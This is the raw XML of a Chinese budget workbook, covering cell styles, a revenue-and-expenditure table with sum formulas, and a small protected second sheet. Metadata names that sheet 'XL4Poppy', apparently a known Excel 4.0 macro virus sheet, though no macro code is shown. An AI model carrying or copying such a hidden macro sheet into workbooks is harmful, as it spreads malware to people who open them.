    <cellStyle name="Pourcentage_pldt" xfId="177"/>
    <cellStyle name="PSDate" xfId="178"/>
    <cellStyle name="PSDec" xfId="179"/>
    <cellStyle name="PSHeading" xfId="180"/>
    <cellStyle name="PSSpacer" xfId="181"/>
    <cellStyle name="RowLevel_0" xfId="182"/>
    <cellStyle name="sstot" xfId="183"/>
    <cellStyle name="t" xfId="184"/>
    <cellStyle name="t_HVAC Equipment (3)" xfId="185"/>
    <cellStyle name="捠壿_Region Orders (2)" xfId="186"/>
    <cellStyle name="통화 [0]_BOILER-CO1" xfId="187"/>
    <cellStyle name="编号" xfId="188"/>
    <cellStyle name="好_Book1_2_Book1" xfId="189"/>
    <cellStyle name="标题1" xfId="190"/>
    <cellStyle name="表标题" xfId="191"/>
    <cellStyle name="强调 3" xfId="192"/>
    <cellStyle name="部门" xfId="193"/>
    <cellStyle name="差_Book1" xfId="194"/>
    <cellStyle name="差_Book1_1" xfId="195"/>
    <cellStyle name="差_Book1_1_Book1" xfId="196"/>
    <cellStyle name="差_Book1_2" xfId="197"/>
    <cellStyle name="常规 10" xfId="198"/>
    <cellStyle name="差_Book1_2_Book1" xfId="199"/>
    <cellStyle name="常规 9" xfId="200"/>
    <cellStyle name="差_Book1_2_Book1_1" xfId="201"/>
    <cellStyle name="差_Book1_3" xfId="202"/>
    <cellStyle name="差_Book1_3_Book1" xfId="203"/>
    <cellStyle name="差_Sheet1" xfId="204"/>
    <cellStyle name="差_收入2010" xfId="205"/>
    <cellStyle name="常规 10 2" xfId="206"/>
    <cellStyle name="常规 11" xfId="207"/>
    <cellStyle name="常规 14" xfId="208"/>
    <cellStyle name="常规 2" xfId="209"/>
    <cellStyle name="常规 4" xfId="210"/>
    <cellStyle name="常规 4 2" xfId="211"/>
    <cellStyle name="常规 5" xfId="212"/>
    <cellStyle name="常规 7" xfId="213"/>
    <cellStyle name="常规 8" xfId="214"/>
    <cellStyle name="分级显示行_1_Book1" xfId="215"/>
    <cellStyle name="好_10吕梁12月劳务工工工资表" xfId="216"/>
    <cellStyle name="好_10吕梁12月劳务工工工资表模板(2)" xfId="217"/>
    <cellStyle name="好_10吕梁12月正式工工资表" xfId="218"/>
    <cellStyle name="好_10吕梁1月劳务工工工资表" xfId="219"/>
    <cellStyle name="好_10吕梁2012年3月工资表（劳务工）" xfId="220"/>
    <cellStyle name="好_10吕梁2012年4月工资表（劳务工）" xfId="221"/>
    <cellStyle name="好_10吕梁2月劳务工工工资表" xfId="222"/>
    <cellStyle name="好_Book1" xfId="223"/>
    <cellStyle name="好_Book1_1" xfId="224"/>
    <cellStyle name="好_Book1_1_Book1" xfId="225"/>
    <cellStyle name="好_Book1_2" xfId="226"/>
    <cellStyle name="好_Book1_2_Book1_1" xfId="227"/>
    <cellStyle name="好_Book1_3" xfId="228"/>
    <cellStyle name="好_Book1_3_Book1" xfId="229"/>
    <cellStyle name="好_Book1_3_Book1_1" xfId="230"/>
    <cellStyle name="好_Book1_4" xfId="231"/>
    <cellStyle name="好_Book1_4_Book1" xfId="232"/>
    <cellStyle name="好_Book1_5" xfId="233"/>
    <cellStyle name="好_Book1_Book1_1" xfId="234"/>
    <cellStyle name="好_Sheet1" xfId="235"/>
    <cellStyle name="好_工资明细表" xfId="236"/>
    <cellStyle name="好_工资明细表 (离石兴业输工资)" xfId="237"/>
    <cellStyle name="借出原因" xfId="238"/>
    <cellStyle name="着色 6" xfId="239"/>
    <cellStyle name="商品名称" xfId="240"/>
    <cellStyle name="콤마 [0]_BOILER-CO1" xfId="241"/>
    <cellStyle name="寘嬫愗傝_Region Orders (2)" xfId="242"/>
    <cellStyle name="콤마_BOILER-CO1" xfId="243"/>
    <cellStyle name="표준_0N-HANDLING " xfId="244"/>
    <cellStyle name="표준_kc-elec system check list" xfId="245"/>
    <cellStyle name="霓付 [0]_97MBO" xfId="246"/>
    <cellStyle name="霓付_97MBO" xfId="247"/>
    <cellStyle name="普通_ 白土" xfId="248"/>
    <cellStyle name="千分位_ 白土" xfId="249"/>
    <cellStyle name="千位[0]_ 方正PC" xfId="250"/>
    <cellStyle name="千位_ 方正PC" xfId="251"/>
    <cellStyle name="强调 1" xfId="252"/>
    <cellStyle name="强调 2" xfId="253"/>
    <cellStyle name="数量" xfId="254"/>
    <cellStyle name="昗弨_Pacific Region P&amp;L" xfId="255"/>
    <cellStyle name="寘嬫愗傝 [0.00]_Region Orders (2)" xfId="256"/>
    <cellStyle name="着色 4" xfId="25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663300"/>
      <rgbColor rgb="00E0E0E0"/>
      <rgbColor rgb="00003300"/>
      <rgbColor rgb="00A0A0A0"/>
      <rgbColor rgb="0080FF00"/>
      <rgbColor rgb="0080FFFF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workbookViewId="0">
      <selection activeCell="A1" sqref="$A1:$XFD1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="43.125" style="11" customWidth="1"/>
    <col min="2" max="9" width="16.125" style="11" customWidth="1"/>
    <col min="10" max="16384" width="8" style="12"/>
  </cols>
  <sheetData>
    <row r="1" ht="35.25" customHeight="1" spans="1:9">
      <c r="A1" s="13" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="13"/>
      <c r="C1" s="13"/>
      <c r="D1" s="14"/>
      <c r="E1" s="13"/>
      <c r="F1" s="13"/>
      <c r="G1" s="13"/>
      <c r="H1" s="13"/>
      <c r="I1" s="13"/>
    </row>
    <row r="2" ht="15" customHeight="1" spans="1:9">
      <c r="A2" s="15"/>
      <c r="B2" s="15"/>
      <c r="C2" s="15"/>
      <c r="D2" s="14"/>
      <c r="E2" s="15"/>
      <c r="F2" s="15"/>
      <c r="G2" s="15"/>
      <c r="H2" s="15"/>
      <c r="I2" s="32" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="3" ht="15" customHeight="1" spans="1:9">
      <c r="A3" s="16" t="s">
        <v>2</v>
      </c>
      <c r="B3" s="17"/>
      <c r="C3" s="18"/>
      <c r="D3" s="19"/>
      <c r="E3" s="17"/>
      <c r="F3" s="17"/>
      <c r="G3" s="17"/>
      <c r="H3" s="17"/>
      <c r="I3" s="33" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="4" ht="37.5" customHeight="1" spans="1:9">
      <c r="A4" s="20" t="s">
        <v>4</v>
      </c>
      <c r="B4" s="21" t="s">
        <v>5</v>
      </c>
      <c r="C4" s="22" t="s">
        <v>6</v>
      </c>
      <c r="D4" s="22" t="s">
        <v>7</v>
      </c>
      <c r="E4" s="23" t="s">
        <v>8</v>
      </c>
      <c r="F4" s="24" t="s">
        <v>9</v>
      </c>
      <c r="G4" s="24" t="s">
        <v>10</v>
      </c>
      <c r="H4" s="24" t="s">
        <v>11</v>
      </c>
      <c r="I4" s="21" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="5" ht="22.5" customHeight="1" spans="1:9">
      <c r="A5" s="25" t="s">
        <v>13</v>
      </c>
      <c r="B5" s="26">
        <f>C5+D5+E5+F5+G5+H5+I5</f>
        <v>224190000</v>
      </c>
      <c r="C5" s="27"/>
      <c r="D5" s="27">
        <v>48008883.73</v>
      </c>
      <c r="E5" s="26">
        <f>E6+E7+E8+E11</f>
        <v>176181116.27</v>
      </c>
      <c r="F5" s="28">
        <v>0</v>
      </c>
      <c r="G5" s="28">
        <v>0</v>
      </c>
      <c r="H5" s="28">
        <v>0</v>
      </c>
      <c r="I5" s="34">
        <v>0</v>
      </c>
    </row>
    <row r="6" ht="22.5" customHeight="1" spans="1:9">
      <c r="A6" s="29" t="s">
        <v>14</v>
      </c>
      <c r="B6" s="26">
        <f>C6+D6+E6+F6+G6+H6+I6</f>
        <v>103292217.15</v>
      </c>
      <c r="C6" s="26"/>
      <c r="D6" s="26">
        <v>12473000</v>
      </c>
      <c r="E6" s="26">
        <v>90819217.15</v>
      </c>
      <c r="F6" s="28">
        <v>0</v>
      </c>
      <c r="G6" s="28">
        <v>0</v>
      </c>
      <c r="H6" s="28">
        <v>0</v>
      </c>
      <c r="I6" s="34">
        <v>0</v>
      </c>
    </row>
    <row r="7" ht="22.5" customHeight="1" spans="1:9">
      <c r="A7" s="29" t="s">
        <v>15</v>
      </c>
      <c r="B7" s="26">
        <f>C7+D7+E7+F7+G7+H7+I7</f>
        <v>2497181.35</v>
      </c>
      <c r="C7" s="26"/>
      <c r="D7" s="26">
        <v>1697181.35</v>
      </c>
      <c r="E7" s="26">
        <v>800000</v>
      </c>
      <c r="F7" s="28">
        <v>0</v>
      </c>
      <c r="G7" s="28">
        <v>0</v>
      </c>
      <c r="H7" s="28">
        <v>0</v>
      </c>
      <c r="I7" s="34">
        <v>0</v>
      </c>
    </row>
    <row r="8" ht="22.5" customHeight="1" spans="1:9">
      <c r="A8" s="30" t="s">
        <v>16</v>
      </c>
      <c r="B8" s="26">
        <f>C8+D8+E8+F8+G8+H8+I8</f>
        <v>118286146.12</v>
      </c>
      <c r="C8" s="26"/>
      <c r="D8" s="26">
        <v>33744247</v>
      </c>
      <c r="E8" s="26">
        <v>84541899.12</v>
      </c>
      <c r="F8" s="28">
        <v>0</v>
      </c>
      <c r="G8" s="28">
        <v>0</v>
      </c>
      <c r="H8" s="28">
        <v>0</v>
      </c>
      <c r="I8" s="34">
        <v>0</v>
      </c>
    </row>
    <row r="9" ht="22.5" customHeight="1" spans="1:9">
      <c r="A9" s="30" t="s">
        <v>17</v>
      </c>
      <c r="B9" s="26">
        <f>C9+D9+E9</f>
        <v>0</v>
      </c>
      <c r="C9" s="26"/>
      <c r="D9" s="26">
        <v>0</v>
      </c>
      <c r="E9" s="26">
        <v>0</v>
      </c>
      <c r="F9" s="28"/>
      <c r="G9" s="28"/>
      <c r="H9" s="28"/>
      <c r="I9" s="28"/>
    </row>
    <row r="10" ht="22.5" customHeight="1" spans="1:9">
      <c r="A10" s="30" t="s">
        <v>18</v>
      </c>
      <c r="B10" s="26">
        <f>C10+D10+E10+F10+G10+H10+I10</f>
        <v>44384</v>
      </c>
      <c r="C10" s="26"/>
      <c r="D10" s="26">
        <v>44384</v>
      </c>
      <c r="E10" s="26">
        <v>0</v>
      </c>
      <c r="F10" s="28">
        <v>0</v>
      </c>
      <c r="G10" s="28">
        <v>0</v>
      </c>
      <c r="H10" s="28">
        <v>0</v>
      </c>
      <c r="I10" s="28">
        <v>0</v>
      </c>
    </row>
    <row r="11" ht="22.5" customHeight="1" spans="1:9">
      <c r="A11" s="30" t="s">
        <v>19</v>
      </c>
      <c r="B11" s="26">
        <f>C11+D11+E11+F11+I11</f>
        <v>70071.38</v>
      </c>
      <c r="C11" s="26"/>
      <c r="D11" s="26">
        <v>50071.38</v>
      </c>
      <c r="E11" s="26">
        <v>20000</v>
      </c>
      <c r="F11" s="28">
        <v>0</v>
      </c>
      <c r="G11" s="28"/>
      <c r="H11" s="28"/>
      <c r="I11" s="28">
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="22.5" customHeight="1" spans="1:9">
      <c r="A12" s="30" t="s">
        <v>20</v>
      </c>
      <c r="B12" s="26">
        <f>C12</f>
        <v>0</v>
      </c>
      <c r="C12" s="26"/>
      <c r="D12" s="26"/>
      <c r="E12" s="26"/>
      <c r="F12" s="28"/>
      <c r="G12" s="28"/>
      <c r="H12" s="28"/>
      <c r="I12" s="28"/>
    </row>
    <row r="13" ht="22.5" customHeight="1" spans="1:9">
      <c r="A13" s="30" t="s">
        <v>21</v>
      </c>
      <c r="B13" s="26">
        <f>C13</f>
        <v>0</v>
      </c>
      <c r="C13" s="26"/>
      <c r="D13" s="26"/>
      <c r="E13" s="26"/>
      <c r="F13" s="28"/>
      <c r="G13" s="28"/>
      <c r="H13" s="28"/>
      <c r="I13" s="28"/>
    </row>
    <row r="14" ht="22.5" customHeight="1" spans="1:9">
      <c r="A14" s="29" t="s">
        <v>22</v>
      </c>
      <c r="B14" s="26">
        <f>C14+D14+E14+F14+G14+H14+I14</f>
        <v>160909999.98</v>
      </c>
      <c r="C14" s="26"/>
      <c r="D14" s="26">
        <v>32306827.68</v>
      </c>
      <c r="E14" s="26">
        <v>128603172.3</v>
      </c>
      <c r="F14" s="28">
        <v>0</v>
      </c>
      <c r="G14" s="28">
        <v>0</v>
      </c>
      <c r="H14" s="28">
        <v>0</v>
      </c>
      <c r="I14" s="28">
        <v>0</v>
      </c>
    </row>
    <row r="15" ht="22.5" customHeight="1" spans="1:9">
      <c r="A15" s="29" t="s">
        <v>23</v>
      </c>
      <c r="B15" s="26">
        <f>C15+D15+E15+F15+G15+H15+I15</f>
        <v>160859999.98</v>
      </c>
      <c r="C15" s="26"/>
      <c r="D15" s="26">
        <v>32276827.68</v>
      </c>
      <c r="E15" s="26">
        <v>128583172.3</v>
      </c>
      <c r="F15" s="28">
        <v>0</v>
      </c>
      <c r="G15" s="28">
        <v>0</v>
      </c>
      <c r="H15" s="28">
        <v>0</v>
      </c>
      <c r="I15" s="28">
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="22.5" customHeight="1" spans="1:9">
      <c r="A16" s="29" t="s">
        <v>24</v>
      </c>
      <c r="B16" s="26">
        <f>C16+D16+E16+F16+G16+H16+I16</f>
        <v>0</v>
      </c>
      <c r="C16" s="26"/>
      <c r="D16" s="26">
        <v>0</v>
      </c>
      <c r="E16" s="26">
        <v>0</v>
      </c>
      <c r="F16" s="28">
        <v>0</v>
      </c>
      <c r="G16" s="28">
        <v>0</v>
      </c>
      <c r="H16" s="28">
        <v>0</v>
      </c>
      <c r="I16" s="28">
        <v>0</v>
      </c>
    </row>
    <row r="17" ht="22.5" customHeight="1" spans="1:9">
      <c r="A17" s="30" t="s">
        <v>25</v>
      </c>
      <c r="B17" s="26">
        <f>C17+D17+E17+F17+I17</f>
        <v>50000</v>
      </c>
      <c r="C17" s="26"/>
      <c r="D17" s="26">
        <v>30000</v>
      </c>
      <c r="E17" s="26">
        <v>20000</v>
      </c>
      <c r="F17" s="28">
        <v>0</v>
      </c>
      <c r="G17" s="28"/>
      <c r="H17" s="28"/>
      <c r="I17" s="28">
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="22.5" customHeight="1" spans="1:9">
      <c r="A18" s="30" t="s">
        <v>26</v>
      </c>
      <c r="B18" s="26">
        <f>C18</f>
        <v>0</v>
      </c>
      <c r="C18" s="26"/>
      <c r="D18" s="26"/>
      <c r="E18" s="26"/>
      <c r="F18" s="28"/>
      <c r="G18" s="28"/>
      <c r="H18" s="28"/>
      <c r="I18" s="28"/>
    </row>
    <row r="19" ht="22.5" customHeight="1" spans="1:9">
      <c r="A19" s="30" t="s">
        <v>27</v>
      </c>
      <c r="B19" s="26">
        <f>C19</f>
        <v>0</v>
      </c>
      <c r="C19" s="26"/>
      <c r="D19" s="26"/>
      <c r="E19" s="26"/>
      <c r="F19" s="28"/>
      <c r="G19" s="28"/>
      <c r="H19" s="28"/>
      <c r="I19" s="28"/>
    </row>
    <row r="20" ht="22.5" customHeight="1" spans="1:9">
      <c r="A20" s="25" t="s">
        <v>28</v>
      </c>
      <c r="B20" s="26">
        <f>C20+D20+E20+F20+G20+H20+I20</f>
        <v>63280000.02</v>
      </c>
      <c r="C20" s="26"/>
      <c r="D20" s="26">
        <v>15702056.05</v>
      </c>
      <c r="E20" s="26">
        <f>E5-E14</f>
        <v>47577943.97</v>
      </c>
      <c r="F20" s="28">
        <v>0</v>
      </c>
      <c r="G20" s="28">
        <v>0</v>
      </c>
      <c r="H20" s="28">
        <v>0</v>
      </c>
      <c r="I20" s="34">
        <v>0</v>
      </c>
    </row>
    <row r="21" ht="22.5" customHeight="1" spans="1:9">
      <c r="A21" s="29" t="s">
        <v>29</v>
      </c>
      <c r="B21" s="26">
        <f>C21+D21+E21+F21+G21+H21+I21</f>
        <v>251659999.98</v>
      </c>
      <c r="C21" s="26"/>
      <c r="D21" s="26">
        <v>105253902.78</v>
      </c>
      <c r="E21" s="26">
        <v>146406097.2</v>
      </c>
      <c r="F21" s="28"/>
      <c r="G21" s="28"/>
      <c r="H21" s="28">
        <v>0</v>
      </c>
      <c r="I21" s="34">
        <v>0</v>
      </c>
    </row>
    <row r="22" ht="18.75" customHeight="1" spans="1:9">
      <c r="A22" s="14"/>
      <c r="B22" s="31"/>
      <c r="C22" s="31"/>
      <c r="D22" s="14"/>
      <c r="E22" s="31"/>
      <c r="F22" s="31"/>
      <c r="G22" s="31"/>
      <c r="H22" s="31"/>
      <c r="I22" s="35" t="s">
        <v>30</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:I1"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.393700787401575" right="0.393700787401575" top="1.18110236220472" bottom="1.18110236220472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" sqref="C1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="7.25" defaultRowHeight="12.75" outlineLevelCol="2"/>
  <cols>
    <col min="1" max="1" width="23.5" style="1" customWidth="1"/>
    <col min="2" max="2" width="1.125" style="1" customWidth="1"/>
    <col min="3" max="3" width="25.25" style="1" customWidth="1"/>
    <col min="4" max="16384" width="7.25" style="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1">
      <c r="A1" s="2" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="2" ht="13.5" spans="1:1">
      <c r="A2" s="2" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="3" ht="13.5" spans="1:3">
      <c r="A3" s="3" t="s">
        <v>33</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="4" spans="1:1">
      <c r="A4" s="3" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="6" ht="13.5"/>
    <row r="7" spans="1:1">
      <c r="A7" s="5" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="8" spans="1:1">
      <c r="A8" s="6" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="9" spans="1:1">
      <c r="A9" s="7" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="10" spans="1:1">
      <c r="A10" s="6" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="11" ht="13.5" spans="1:1">
      <c r="A11" s="8" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="13" ht="13.5"/>
    <row r="14" ht="13.5" spans="1:1">
      <c r="A14" s="4" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="16" ht="13.5"/>
    <row r="17" ht="13.5" spans="3:3">
      <c r="C17" s="4" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="20" spans="1:1">
      <c r="A20" s="9" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="26" ht="13.5" spans="3:3">
      <c r="C26" s="10" t="s">
        <v>43</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection password="8863" sheet="1" object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预算总表</vt:lpstr>
      <vt:lpstr>XL4Poppy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玉洁</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-19T11:49:00Z</dcterms:created>
  <cp:lastPrinted>2020-05-19T04:09:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-19T07:30:35Z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